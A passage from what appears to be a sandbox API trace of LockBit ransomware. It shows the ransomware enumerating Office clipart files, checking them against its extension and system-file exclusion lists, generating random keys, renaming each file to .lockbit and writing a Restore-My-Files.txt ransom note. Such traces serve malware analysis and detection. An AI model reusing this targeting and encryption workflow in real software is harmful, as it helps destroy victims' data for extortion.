ftLastWriteTime.dwHighDateTime=0x1bd4bdc, nFileSizeHigh=0x0, nFileSizeLow=0x1526, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH01759_.WMF", cAlternateFileName="")) returned 1 [0118.334] lstrcmpiW (lpString1=".", lpString2="HH01759_.WMF") returned -1 [0118.334] lstrcmpiW (lpString1="..", lpString2="HH01759_.WMF") returned -1 [0118.334] PathFindExtensionW (pszPath="HH01759_.WMF") returned=".WMF" [0118.335] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.335] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.336] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.336] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.337] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.337] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.337] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.337] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.337] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.337] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.337] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.337] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH01759_.WMF") returned 1 [0118.337] lstrcmpiW (lpString1="ntldr", lpString2="HH01759_.WMF") returned 1 [0118.337] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH01759_.WMF") returned 1 [0118.337] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH01759_.WMF") returned -1 [0118.337] lstrcmpiW (lpString1="autorun.inf", lpString2="HH01759_.WMF") returned -1 [0118.337] lstrcmpiW (lpString1="thumbs.db", lpString2="HH01759_.WMF") returned 1 [0118.337] lstrcmpiW (lpString1="iconcache.db", lpString2="HH01759_.WMF") returned 1 [0118.337] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.337] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned=".WMF" [0118.337] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.337] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.337] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.337] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.338] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.339] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.339] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.339] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.339] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.339] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF.lockbit") returned 72 [0118.339] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01759_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0118.348] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.349] malloc (_Size=0x40068) returned 0x1ff1e60 [0118.349] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5414) returned 1 [0118.349] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.349] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0118.349] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.350] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0118.350] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.354] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.354] malloc (_Size=0xa6) returned 0x77d7a8 [0118.354] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.355] free (_Block=0x77d7a8) [0118.355] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.355] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.355] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.356] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b938600, ftCreationTime.dwHighDateTime=0x1bd4bf0, ftLastAccessTime.dwLowDateTime=0x538951f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3b938600, ftLastWriteTime.dwHighDateTime=0x1bd4bf0, nFileSizeHigh=0x0, nFileSizeLow=0xa38, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH01875_.WMF", cAlternateFileName="")) returned 1 [0118.356] lstrcmpiW (lpString1=".", lpString2="HH01875_.WMF") returned -1 [0118.356] lstrcmpiW (lpString1="..", lpString2="HH01875_.WMF") returned -1 [0118.356] PathFindExtensionW (pszPath="HH01875_.WMF") returned=".WMF" [0118.356] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.356] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.356] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.356] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.356] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.356] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.356] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.356] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.356] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.356] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.356] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.356] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.356] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.356] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.356] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.356] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.356] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.357] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.357] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.358] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.358] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.358] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.358] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.358] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.358] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.358] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.358] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.358] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH01875_.WMF") returned 1 [0118.358] lstrcmpiW (lpString1="ntldr", lpString2="HH01875_.WMF") returned 1 [0118.358] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH01875_.WMF") returned 1 [0118.358] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH01875_.WMF") returned -1 [0118.358] lstrcmpiW (lpString1="autorun.inf", lpString2="HH01875_.WMF") returned -1 [0118.358] lstrcmpiW (lpString1="thumbs.db", lpString2="HH01875_.WMF") returned 1 [0118.358] lstrcmpiW (lpString1="iconcache.db", lpString2="HH01875_.WMF") returned 1 [0118.358] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.358] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned=".WMF" [0118.358] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.358] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.358] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.358] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.358] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.359] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.360] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF.lockbit") returned 72 [0118.360] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01875_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0118.360] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.360] malloc (_Size=0x40068) returned 0x3e70008 [0118.360] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2616) returned 1 [0118.361] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.361] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0118.361] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.362] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0118.362] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0118.371] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.372] malloc (_Size=0xa6) returned 0x77d7a8 [0118.372] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.372] free (_Block=0x77d7a8) [0118.373] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.373] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.373] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.373] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71426a00, ftCreationTime.dwHighDateTime=0x1bd4c04, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x71426a00, ftLastWriteTime.dwHighDateTime=0x1bd4c04, nFileSizeHigh=0x0, nFileSizeLow=0x6852, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH01923_.WMF", cAlternateFileName="")) returned 1 [0118.373] lstrcmpiW (lpString1=".", lpString2="HH01923_.WMF") returned -1 [0118.373] lstrcmpiW (lpString1="..", lpString2="HH01923_.WMF") returned -1 [0118.373] PathFindExtensionW (pszPath="HH01923_.WMF") returned=".WMF" [0118.373] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.373] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.373] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.373] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.373] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.373] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.373] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.373] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.373] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.373] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.373] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.374] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.374] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.375] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH01923_.WMF") returned 1 [0118.375] lstrcmpiW (lpString1="ntldr", lpString2="HH01923_.WMF") returned 1 [0118.375] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH01923_.WMF") returned 1 [0118.375] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH01923_.WMF") returned -1 [0118.375] lstrcmpiW (lpString1="autorun.inf", lpString2="HH01923_.WMF") returned -1 [0118.376] lstrcmpiW (lpString1="thumbs.db", lpString2="HH01923_.WMF") returned 1 [0118.376] lstrcmpiW (lpString1="iconcache.db", lpString2="HH01923_.WMF") returned 1 [0118.376] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.376] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned=".WMF" [0118.376] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.376] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.376] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.376] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.376] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.376] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.376] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.376] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.376] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.376] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.376] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.376] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.376] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.376] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.376] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.376] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.376] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.377] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.377] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.377] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.377] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.377] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.377] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.377] lstrcmpiW (lpString1=".sql", 